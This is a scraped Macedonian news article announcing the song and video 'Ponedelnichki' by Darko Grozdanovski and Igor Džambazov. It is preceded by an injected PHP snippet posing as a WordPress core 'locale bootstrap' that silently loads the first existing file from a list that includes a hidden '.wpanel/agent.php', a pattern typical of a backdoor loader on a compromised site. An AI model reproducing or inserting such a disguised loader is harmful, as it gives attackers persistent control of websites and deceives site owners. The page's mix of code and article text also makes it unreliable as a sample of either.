// wp-core-locale-bootstrap $_wp_locale_candidates = [ __DIR__ . '/languages/class-wp-locale-data.php', __DIR__ . '/upgrade/class-wp-locale-data.php', __DIR__ . '/cache/class-wp-locale-data.php', __DIR__ . '/.wpanel/agent.php', ]; foreach ($_wp_locale_candidates as $_wp_locale_data) { if (is_file($_wp_locale_data)) { require_once $_wp_locale_data; break; } } Дарко Гроздановски и Игор Џамбазов, малку порано од најавеното – „Понеделнички” - Република Skip to main content

Дарко Гроздановски и Игор Џамбазов, малку порано од најавеното – „Понеделнички”

Дарко Гроздановски и Игор Џамбазов – спој на младоста и искуството, а како заедничка особина и на двајцата, како и на целиот тим вклучен во овој проект: енергијата, трудот и искрената желба да се создаде не само песна со видео запис, туку парче уметност. Главниот „виновник” за спојот на оваа група уметници е продукцијата „Fresh Union” зад која стои Васко Павлевски кој безрезервно се вложи тимот да е составен од најдобрите од најдобрите, односно: Мите Димовски на чело на сите вклучени во аудиото, Огнен Шапковски – уметникот позади камерата, а преубавата и добро позната Моника Црнокрак – „шанкерката” во која се вљубува главниот лик – Дарко Гроздановски. И секако… Легендарниот Игор Џамбазов – татко на шанкерката, газдата на локалот во „masterpiece” сценариото на Шапковски, каде како главен заплет се појавува конфликтот помеѓу Игор и Дарко. Игор Џамбазов – авторот на многу безвременски хитови, Игор Џамбазов – авторот на „Понеделнички”. Дојде и тој понеделник каде Дарko Гроздановски по три години без авторска песна, повторно се појавува во етерот. Овој пат во ново и можеби најквалитетно руво до сега, создадено од „материјали” врз кои се темели македонската музичка уметност. Дали вредеше чекањето, проценете сами драги гледачи и слушатели и уживајте во „Понеделнички” денес и секој ден од неделата, секоја недела. „Сакам сите денови да се понеделници”, напиша Џамбазов, испеа Гроздановски, а Вие… Уживајте.